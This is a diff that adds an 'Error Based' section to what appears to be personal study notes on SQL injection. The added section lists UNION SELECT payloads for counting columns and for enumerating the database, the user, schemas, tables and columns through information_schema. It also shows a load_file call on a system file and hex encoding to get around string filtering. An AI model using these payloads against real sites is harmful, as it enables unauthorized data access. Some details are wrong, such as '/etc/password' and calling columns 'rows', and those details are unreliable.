--- a/_posts/notes/databases/2021-12-12-sqli.md
+++ b/_posts/notes/databases/2021-12-12-sqli.md
@@ -29,3 +29,49 @@ We can check all the tables with this:
 ' union select null, 'test', from dual --
 {% endhighlight %}
 We need to use the same number of field from the tables, so we just need to keep trying adding new fields.
+
+# [](#header-4)Error Based
+When we see an SQL error in the page we can try to gather information of the web.
+Adding and:
+{% highlight plain %}
+... ORDER BY 5; --
+{% endhighlight %}
+We can check how many rows are in the query.
+##### (We can change **--** to others SQL comments.)
+
+Then we can do an union with the columns:
+{% highlight plain %}
+... UNION SELECT 1,2,3,4,5;
+... UNION SELECT NULL,NULL,NULL,NULL,NULL;
+{% endhighlight %}
+
+We can use to enumerate the following functions, replacing the numbers or NULL:
+- database()
+- user()
+- load_file('/etc/password')
+
+Now we can get the tables from the database:
+{% highlight plain %}
+... UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema = "database-name";
+{% endhighlight %}
+
+Or the others databases:
+{% highlight plain %}
+... UNION SELECT schema_name,NULL FROM information_schema.schemata;
+{% endhighlight %}
+Some databases can limit the amount on databases show, we can try to change it with limit:
+{% highlight plain %}
+... UNION SELECT schema_name,NULL FROM information_schema.schemata LIMIT 1,1; -- This will show the first one
+... UNION SELECT schema_name,NULL FROM information_schema.schemata LIMIT 2,1; -- This will show the second one
+{% endhighlight %}
+
+To get the columns of a table:
+{% highlight plain %}
+... UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_schema = "database-name" AND table_name = "table-name";
+{% endhighlight %}
+
+If we can not pass a string like **"database-name"** we can encode it:
+{% highlight plain %}
+> echo "database-name" | xxd -ps
+{% endhighlight %}
+##### (We may remove the **0a**, and add a **0x** at the beggining.)
